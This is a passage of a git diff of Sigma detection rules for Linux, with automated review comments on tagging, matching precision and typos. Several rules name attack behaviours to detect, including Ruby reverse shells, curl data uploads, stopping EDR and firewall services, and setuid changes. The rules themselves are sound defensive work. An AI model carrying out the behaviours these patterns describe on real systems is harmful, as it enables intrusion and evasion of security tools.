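Review bot: `attack.t1133` (External Remote Services) is an unusual mapping for a remote-access-tool session; ATT&CK models TeamViewer-style software as T1219 Remote Access Software under Command and Control, so `- attack.command_and_control` and `- attack.t1219` are the expected tags, possibly in addition to the current pair. `CommandLine|endswith: '/TeamViewer_Desktop --IPCport 5939 --Module 1'` pins the rule to one exact argument string, which is brittle across client versions; a comment recording the TeamViewer version this was observed on, e.g. `# Observed on TeamViewer <version observed — fill in>`, would tell maintainers when to re-check it.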
@@ -2,45 +2,45 @@ title: Linux Remote System Discovery
 id: 11063ec2-de63-4153-935e-b1a8b9e616f1
 status: test
 description: Detects the enumeration of other remote systems.
-author: Alejandro Ortuno, oscd.community
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
+author: Alejandro Ortuno, oscd.community
 date: 2020/10/22
 modified: 2021/11/27
+tags:
+ - attack.discovery
+ - attack.t1018
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- selection_1:
- Image|endswith: '/arp'
- CommandLine|contains: '-a'
- selection_2:
- Image|endswith: '/ping'
- CommandLine|contains:
- - ' 10.' #10.0.0.0/8
- - ' 192.168.' #192.168.0.0/16
- - ' 172.16.' #172.16.0.0/12
- - ' 172.17.'
- - ' 172.18.'
- - ' 172.19.'
- - ' 172.20.'
- - ' 172.21.'
- - ' 172.22.'
- - ' 172.23.'
- - ' 172.24.'
- - ' 172.25.'
- - ' 172.26.'
- - ' 172.27.'
- - ' 172.28.'
- - ' 172.29.'
- - ' 172.30.'
- - ' 172.31.'
- - ' 127.' #127.0.0.0/8
- - ' 169.254.' #169.254.0.0/16
- condition: 1 of selection*
+ selection_1:
+ Image|endswith: '/arp'
+ CommandLine|contains: '-a'
+ selection_2:
+ Image|endswith: '/ping'
+ CommandLine|contains:
+ - ' 10.' # 10.0.0.0/8
+ - ' 192.168.' # 192.168.0.0/16
+ - ' 172.16.' # 172.16.0.0/12
+ - ' 172.17.'
+ - ' 172.18.'
+ - ' 172.19.'
+ - ' 172.20.'
+ - ' 172.21.'
+ - ' 172.22.'
+ - ' 172.23.'
+ - ' 172.24.'
+ - ' 172.25.'
+ - ' 172.26.'
+ - ' 172.27.'
+ - ' 172.28.'
+ - ' 172.29.'
+ - ' 172.30.'
+ - ' 172.31.'
+ - ' 127.' # 127.0.0.0/8
+ - ' 169.254.' # 169.254.0.0/16
+ condition: 1 of selection*
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: low
-tags:
- - attack.discovery
- - attack.t1018
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml
new file mode 100644
index 000000000..06346824c
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_remove_package.yml
@@ -0,0 +1,42 @@
+title: Linux Package Uninstall
+id: 95d61234-7f56-465c-6f2d-b562c6fedbc4
+status: test
+description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
+references:
+ - https://sysdig.com/blog/mitre-defense-evasion-falco
+ - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command
+ - https://linuxhint.com/uninstall_yum_package/
+ - https://linuxhint.com/uninstall-debian-packages/
+author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)
+date: 2023/03/09
+tags:
+ - attack.defense_evasion
+ - attack.t1070
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection_yum:
+ Image|endswith: '/yum'
+ CommandLine|contains:
+ - 'erase'
+ - 'remove'
+ selection_apt:
+ Image|endswith:
+ - '/apt'
+ - '/apt-get'
+ CommandLine|contains:
+ - 'remove'
+ - 'purge'
+ selection_dpkg:
+ Image|endswith: '/dpkg'
+ CommandLine|contains:
+ - '--remove '
+ - ' -r '
+ selection_rpm:
+ Image|endswith: '/rpm'
+ CommandLine|contains: ' -e '
+ condition: 1 of selection_*
+falsepositives:
+ - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml
new file mode 100644
index 000000000..6bacb829c
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml
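Review bot: `dnf`, the default package manager on current Fedora and RHEL-family systems, is not covered while `yum` and `rpm` are, so package removal on those hosts goes unseen; a `selection_dnf` mirroring `selection_yum` closes the gap, and the description's tool list should then name it too. Note also that `'remove'` under `selection_yum` and `selection_apt` is a substring match and therefore fires on `autoremove` as well, which is routine cleanup; `falsepositives` should say so.
```yaml
    # … unchanged: selection_yum / selection_apt / selection_dpkg / selection_rpm …
    selection_dnf:
        Image|endswith: '/dnf'
        CommandLine|contains:
            - 'erase'
            - 'remove'
    condition: 1 of selection_*
```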
@@ -0,0 +1,34 @@
+title: Potential Ruby Reverse Shell
+id: b8bdac18-c06e-4016-ac30-221553e74f59
+status: test
+description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
+references:
+ - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+ - https://www.revshells.com/
+author: '@d4ns4n_'
+date: 2023/04/07
+tags:
+ - attack.execution
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|contains: 'ruby'
+ CommandLine|contains|all:
+ - ' -e'
+ - 'rsocket'
+ - 'TCPSocket'
+ CommandLine|contains:
+ - ' ash'
+ - ' bash'
+ - ' bsh'
+ - ' csh'
+ - ' ksh'
+ - ' pdksh'
+ - ' sh'
+ - ' tcsh'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml
index 0a78a6256..b9f627587 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml
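Review bot: The `'rsocket'` entry in `CommandLine|contains|all` is opaque as written; it is evidently meant to match the `-rsocket` require flag, but nothing in the rule says so, and a maintainer could easily read it as a typo. A comment on that line, `# matches the "-rsocket" library require flag`, would make the intent explicit. The `' -e'` entry also differs from the `' -e '` form used by the perl and netcat rules in this commit (no trailing space, so it also matches longer flags beginning with `-e`); if that is intended, the description's reference to the `-e` flag should say so.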
@@ -1,25 +1,25 @@
-title: Scheduled Cron Task/Job
+title: Scheduled Cron Task/Job - Linux
 id: 6b14bac8-3e3a-4324-8109-42f0546a347f
 status: test
 description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
-author: Alejandro Ortuno, oscd.community
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
+author: Alejandro Ortuno, oscd.community
 date: 2020/10/06
-modified: 2021/11/27
+modified: 2022/11/27
+tags:
+ - attack.execution
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.t1053.003
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- selection:
- Image|endswith: 'crontab'
- CommandLine|contains: '/tmp/'
- condition: selection
+ selection:
+ Image|endswith: 'crontab'
+ CommandLine|contains: '/tmp/'
+ condition: selection
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: medium
-tags:
- - attack.execution
- - attack.persistence
- - attack.privilege_escalation
- - attack.t1053.003
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml
index dd93f19bd..5101c2e75 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml
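Review bot: `Image|endswith: 'crontab'` has no leading slash, unlike every other `Image|endswith` value in this commit (`'/nohup'`, `'/mkfifo'`, `'/grep'`), so it also matches any binary whose name merely ends in `crontab`; `Image|endswith: '/crontab'` keeps the rule consistent and removes that looseness. This value is pre-existing and was only re-indented by the commit, but the reformat is the natural moment to fix it.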
@@ -1,32 +1,34 @@
-title: Security Software Discovery
+title: Security Software Discovery - Linux
 id: c9d8b7fd-78e4-44fe-88f6-599135d46d60
 status: test
-description: Detects usage of system utilities (only grep for now) to discover security software discovery
-author: Daniil Yugoslavskiy, oscd.community
+description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
 references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
+author: Daniil Yugoslavskiy, oscd.community
 date: 2020/10/19
-modified: 2021/11/27
+modified: 2022/11/27
+tags:
+ - attack.discovery
+ - attack.t1518.001
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- grep_execution:
- Image|endswith: '/grep'
- security_services_and_processes:
- CommandLine|contains:
- - 'nessusd' # nessus vulnerability scanner
- - 'td-agent' # fluentd log shipper
- - 'packetbeat' # elastic network logger/shipper
- - 'filebeat' # elastic log file shipper
- - 'auditbeat' # elastic auditing agent/log shipper
- - 'osqueryd' # facebook osquery
- - 'cbagentd' # carbon black
- - 'falcond' # crowdstrike falcon
- condition: grep_execution and security_services_and_processes
+ selection:
+ Image|endswith:
+ # You can add more grep variations such as fgrep, rgrep...etc
+ - '/grep'
+ - '/egrep'
+ CommandLine|contains:
+ - 'nessusd' # nessus vulnerability scanner
+ - 'td-agent' # fluentd log shipper
+ - 'packetbeat' # elastic network logger/shipper
+ - 'filebeat' # elastic log file shipper
+ - 'auditbeat' # elastic auditing agent/log shipper
+ - 'osqueryd' # facebook osquery
+ - 'cbagentd' # carbon black
+ - 'falcond' # crowdstrike falcon
+ condition: selection
 falsepositives:
- - Legitimate activities
+ - Legitimate activities
 level: low
-tags:
- - attack.discovery
- - attack.t1518.001
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml
index b82d1f331..fa83e7f38 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml
@@ -1,12 +1,12 @@
 title: Disabling Security Tools
 id: e3a8a052-111f-4606-9aee-f28ebeb76776
-status: experimental
+status: test
 description: Detects disabling security tools
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
 author: Ömer Günal, Alejandro Ortuno, oscd.community
 date: 2020/06/17
-modified: 2021/09/14
-references:
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md
+modified: 2022/10/09
 tags:
 - attack.defense_evasion
 - attack.t1562.004
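Review bot: `Image|endswith` in the new `selection` lists `'/grep'` and `'/egrep'` separately, and the comment invites adding `fgrep`, `rgrep` and so on one at a time; a single unslashed `- 'grep'` entry, as `proc_creation_lnx_susp_container_residence_discovery.yml` in this same commit uses, would cover all of those variants at once. If the slash-prefixed form is kept on purpose, to avoid matching unrelated binaries whose name merely ends in `grep`, that reasoning belongs in the comment. The description's phrase `to discover security software discovery` also reads as a leftover and could be shortened to `to discover security software`.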
@@ -17,66 +17,66 @@ detection:
 selection_iptables_1:
 Image|endswith: '/service'
 CommandLine|contains|all:
- - 'iptables'
- - 'stop'
+ - 'iptables'
+ - 'stop'
 selection_iptables_2:
 Image|endswith: '/service'
 CommandLine|contains|all:
- - 'ip6tables'
- - 'stop'
+ - 'ip6tables'
+ - 'stop'
 selection_iptables_3:
 Image|endswith: '/chkconfig'
 CommandLine|contains|all:
- - 'iptables'
- - 'stop'
+ - 'iptables'
+ - 'stop'
 selection_iptables_4:
 Image|endswith: '/chkconfig'
 CommandLine|contains|all:
- - 'ip6tables'
- - 'stop'
+ - 'ip6tables'
+ - 'stop'
 selection_firewall_1:
 Image|endswith: '/systemctl'
 CommandLine|contains|all:
- - 'firewalld'
- - 'stop'
+ - 'firewalld'
+ - 'stop'
 selection_firewall_2:
 Image|endswith: '/systemctl'
 CommandLine|contains|all:
- - 'firewalld'
- - 'disable'
+ - 'firewalld'
+ - 'disable'
 selection_carbonblack_1:
 Image|endswith: '/service'
 CommandLine|contains|all:
- - 'cbdaemon'
- - 'stop'
+ - 'cbdaemon'
+ - 'stop'
 selection_carbonblack_2:
 Image|endswith: '/chkconfig'
 CommandLine|contains|all:
- - 'cbdaemon'
- - 'off'
+ - 'cbdaemon'
+ - 'off'
 selection_carbonblack_3:
 Image|endswith: '/systemctl'
 CommandLine|contains|all:
- - 'cbdaemon'
- - 'stop'
+ - 'cbdaemon'
+ - 'stop'
 selection_carbonblack_4:
 Image|endswith: '/systemctl'
 CommandLine|contains|all:
- - 'cbdaemon'
- - 'disable'
+ - 'cbdaemon'
+ - 'disable'
 selection_selinux:
 Image|endswith: '/setenforce'
 CommandLine|contains: '0'
 selection_crowdstrike_1:
 Image|endswith: '/systemctl'
 CommandLine|contains|all:
- - 'stop'
- - 'falcon-sensor'
+ - 'stop'
+ - 'falcon-sensor'
 selection_crowdstrike_2:
 Image|endswith: '/systemctl'
 CommandLine|contains|all:
- - 'disable'
- - 'falcon-sensor'
+ - 'disable'
+ - 'falcon-sensor'
 condition: 1 of selection*
 falsepositives:
 - Legitimate administration activities
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
new file mode 100644
index 000000000..4cd164140
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml
@@ -0,0 +1,26 @@
+title: Disable Or Stop Services
+id: de25eeb8-3655-4643-ac3a-b662d3f26b6b
+status: test
+description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
+references:
+ - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/09/15
+tags:
+ - attack.defense_evasion
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith:
+ - '/service'
+ - '/systemctl'
+ - '/chkconfig'
+ CommandLine|contains:
+ - 'stop'
+ - 'disable'
+ condition: selection
+falsepositives:
+ - Legitimate administration activities
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml
new file mode 100644
index 000000000..f807d3c60
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml
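Review bot: `CommandLine|contains` with the bare substrings `'stop'` and `'disable'` and no service-name constraint matches every routine `systemctl stop`, `service ... stop` or `systemctl disable` on the host, so at `level: medium` this rule will fire far more often than the service-specific `proc_creation_lnx_security_tools_disabling.yml` touched by the same commit. Consider `level: low`, or record under `falsepositives:` that this is a broad hunting rule meant to be paired with an allow-list of expected services, so operators do not treat every hit as an incident.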
@@ -0,0 +1,27 @@
+title: Setuid and Setgid
+id: c21c4eaa-ba2e-419a-92b2-8371703cbe21
+status: test
+description: Detects suspicious change of file privileges with chown and chmod commands
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md
+ - https://attack.mitre.org/techniques/T1548/001/
+author: Ömer Günal
+date: 2020/06/16
+modified: 2022/10/05
+tags:
+ - attack.persistence
+ - attack.t1548.001
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection_root:
+ CommandLine|contains: 'chown root'
+ selection_perm:
+ CommandLine|contains:
+ - ' chmod u+s'
+ - ' chmod g+s'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate administration activities
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml
new file mode 100644
index 000000000..86183047b
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml
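Review bot: `condition: all of selection_*` requires `'chown root'` and one of the `' chmod u+s'`/`' chmod g+s'` substrings in the same CommandLine, so a `chmod u+s <file>` executed as its own process, which is what a process_creation event normally carries, never matches; only a compound command string (for example one passed through `sh -c`) can. If either step alone is meant to alert, the condition should be `1 of selection_*`; if the combination is intended, the description should say so. Numeric setuid/setgid modes such as `chmod 4755` are also outside the two quoted patterns, which is worth noting under `falsepositives:` or in a comment.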
@@ -0,0 +1,29 @@
+title: Potential Linux Amazon SSM Agent Hijacking
+id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7
+status: experimental
+description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+references:
+ - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
+ - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/
+ - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
+author: Muhammad Faisal
+date: 2023/08/03
+tags:
+ - attack.command_and_control
+ - attack.persistence
+ - attack.t1219
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/amazon-ssm-agent'
+ CommandLine|contains|all:
+ - '-register '
+ - '-code '
+ - '-id '
+ - '-region '
+ condition: selection
+falsepositives:
+ - Legitimate activity of system administrators
+level: medium
diff --git a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
similarity index 76%
rename from src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml
rename to src/main/resources/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
index bc4c3da22..3226bafe7 100644
--- a/src/main/resources/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml
@@ -1,25 +1,26 @@
 title: Sudo Privilege Escalation CVE-2019-14287
 id: f74107df-b6c6-4e80-bf00-4170b658162b
-status: experimental
+status: test
 description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
-author: Florian Roth
-date: 2019/10/15
-modified: 2021/09/14
 references:
 - https://www.openwall.com/lists/oss-security/2019/10/14/1
 - https://access.redhat.com/security/cve/cve-2019-14287
 - https://twitter.com/matthieugarin/status/1183970598210412546
-logsource:
- product: linux
+author: Florian Roth (Nextron Systems)
+date: 2019/10/15
+modified: 2022/10/05
 tags:
 - attack.privilege_escalation
 - attack.t1068
 - attack.t1548.003
 - cve.2019.14287
+logsource:
+ product: linux
+ category: process_creation
 detection:
- selection_keywords:
- - '* -u#*'
- condition: selection_keywords
+ selection:
+ CommandLine|contains: ' -u#'
+ condition: selection
 falsepositives:
 - Unlikely
 level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml
index 080bc6be2..e570ccd0d 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml
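Review bot: The rewritten `selection` matches `' -u#'` in any process command line with no `Image` constraint, so any other tool given a `-u` option whose value starts with `#` trips a `level: high` alert; adding `Image|endswith: '/sudo'` next to the `CommandLine|contains` line scopes the rule to the binary the CVE concerns. `-u#<uid>` is also documented sudo syntax rather than a marker unique to the exploit, so `falsepositives: - Unlikely` is optimistic even after that scoping and could mention scripts that invoke sudo by numeric uid.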
@@ -1,27 +1,27 @@
 title: Chmod Suspicious Directory
 id: 6419afd1-3742-47a5-a7e6-b50386cd15f8
-status: experimental
+status: test
 description: Detects chmod targeting files in abnormal directory paths.
-author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
 references:
- - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/
- - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md
+ - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
+author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
 date: 2022/06/03
+tags:
+ - attack.defense_evasion
+ - attack.t1222.002
 logsource:
- product: linux
- category: process_creation
+ product: linux
+ category: process_creation
 detection:
- selection:
- Image|endswith: '/chmod'
- CommandLine|contains:
- - '/tmp/'
- - '/.Library/'
- - '/etc/'
- - '/opt/'
- condition: selection
+ selection:
+ Image|endswith: '/chmod'
+ CommandLine|contains:
+ - '/tmp/'
+ - '/.Library/'
+ - '/etc/'
+ - '/opt/'
+ condition: selection
 falsepositives:
- - Admin changing file permissions.
+ - Admin changing file permissions.
 level: medium
-tags:
- - attack.defense_evasion
- - attack.t1222.002
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml
new file mode 100644
index 000000000..0a5d36c4f
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml
@@ -0,0 +1,38 @@
+title: Container Residence Discovery Via Proc Virtual FS
+id: 746c86fb-ccda-4816-8997-01386263acc4
+status: experimental
+description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
+references:
+ - https://blog.skyplabs.net/posts/container-detection/
+ - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
+tags:
+ - attack.discovery
+ - attack.t1082
+author: Seth Hanford
+date: 2023/08/23
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_tools:
+ Image|endswith:
+ - 'awk'
+ - '/cat'
+ - 'grep'
+ - '/head'
+ - '/less'
+ - '/more'
+ - '/nl'
+ - '/tail'
+ selection_procfs_kthreadd: # outside containers, PID 2 == kthreadd
+ CommandLine|contains: '/proc/2/'
+ selection_procfs_target:
+ CommandLine|contains: '/proc/'
+ CommandLine|endswith:
+ - '/cgroup' # cgroups end in ':/' outside containers
+ - '/sched' # PID mismatch when run in containers
+ condition: selection_tools and 1 of selection_procfs_*
+falsepositives:
+ - Legitimate system administrator usage of these commands
+ - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
new file mode 100644
index 000000000..136298154
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml
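Review bot: The key order in this new rule puts `tags` before `author` and `date`, while the other new rules in this commit (the `services_stop_and_disable` and `setgid_setuid` files, for instance) place `author`, `date` and `modified` between `references` and `tags`; the same ordering appears in the `dockerenv_recon` and `inod_listing` hunks by the same author. Moving `author: Seth Hanford` and `date: 2023/08/23` above `tags:` keeps the three files consistent with the rest of the rule set. `Image|endswith: 'awk'` and `'grep'` are unslashed, presumably to catch `gawk`, `egrep` and similar; a one-line comment saying so would stop the next reader from "fixing" them to match the slashed entries.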
@@ -0,0 +1,41 @@
+title: Suspicious Curl File Upload - Linux
+id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
+related:
+ - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
+ type: derived
+status: test
+description: Detects a suspicious curl process start the adds a file to a web request
+references:
+ - https://twitter.com/d1r4c/status/1279042657508081664
+ - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
+ - https://curl.se/docs/manpage.html
+ - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
+author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
+date: 2022/09/15
+modified: 2023/05/02
+tags:
+ - attack.exfiltration
+ - attack.t1567
+ - attack.t1105
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith: '/curl'
+ selection_cli:
+ - CommandLine|contains:
+ - ' --form' # Also covers the "--form-string"
+ - ' --upload-file '
+ - ' --data '
+ - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
+ - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
+ filter_optional_localhost:
+ CommandLine|contains:
+ - '://localhost'
+ - '://127.0.0.1'
+ condition: all of selection_* and not 1 of filter_optional_*
+falsepositives:
+ - Scripts created by developers and admins
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
new file mode 100644
index 000000000..33e5eb987
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml
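Review bot: `filter_optional_localhost` suppresses the whole event whenever `'://localhost'` or `'://127.0.0.1'` appears anywhere in the command line, so an upload whose target is a remote host but whose command also carries a local address (a `--proxy http://127.0.0.1:...` argument, for instance) is silently excluded. If the intent is to exclude only uploads to local targets, the filter should anchor on the URL argument itself, or the trade-off should be documented in a comment beside the filter; `'://[::1]'` is also missing from the list. Separately, the description has a typo and should read `description: Detects a suspicious curl process start that adds a file to a web request`.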
@@ -0,0 +1,28 @@
+title: Suspicious Curl Change User Agents - Linux
+id: b86d356d-6093-443d-971c-9b07db583c68
+related:
+ - id: 3286d37a-00fd-41c2-a624-a672dcd34e60
+ type: derived
+status: test
+description: Detects a suspicious curl process start on linux with set useragent options
+references:
+ - https://curl.se/docs/manpage.html
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/09/15
+tags:
+ - attack.command_and_control
+ - attack.t1071.001
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/curl'
+ CommandLine|contains:
+ - ' -A '
+ - ' --user-agent '
+ condition: selection
+falsepositives:
+ - Scripts created by developers and admins
+ - Administrative activity
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml
new file mode 100644
index 000000000..22b41e675
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml
@@ -0,0 +1,32 @@
+title: Docker Container Discovery Via Dockerenv Listing
+id: 11701de9-d5a5-44aa-8238-84252f131895
+status: experimental
+description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
+references:
+ - https://blog.skyplabs.net/posts/container-detection/
+ - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
+tags:
+ - attack.discovery
+ - attack.t1082
+author: Seth Hanford
+date: 2023/08/23
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith:
+ # Note: add additional tools and utilities to increase coverage
+ - '/cat'
+ - '/dir'
+ - '/find'
+ - '/ls'
+ - '/stat'
+ - '/test'
+ - 'grep'
+ CommandLine|endswith: '.dockerenv'
+ condition: selection
+falsepositives:
+ - Legitimate system administrator usage of these commands
+ - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml
new file mode 100644
index 000000000..c0ac903fa
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml
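Review bot: The description in this hunk has a typo, `sing` for `sign`; it should read `description: Detects listing or file reading of ".dockerenv" which can be a sign of potential container discovery`. Also, `CommandLine|endswith: '.dockerenv'` only matches when the file name is the final token, so any invocation with a trailing argument after the path is missed; `CommandLine|contains: '.dockerenv'` would be the more robust form if the added noise is acceptable, and whichever is chosen should be explained in the comment block that already invites extending the tool list.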
@@ -0,0 +1,24 @@
+title: Potentially Suspicious Execution From Tmp Folder
+id: 312b42b1-bded-4441-8b58-163a3af58775
+status: experimental
+description: Detects a potentially suspicious execution of a process located in the '/tmp/' folder
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
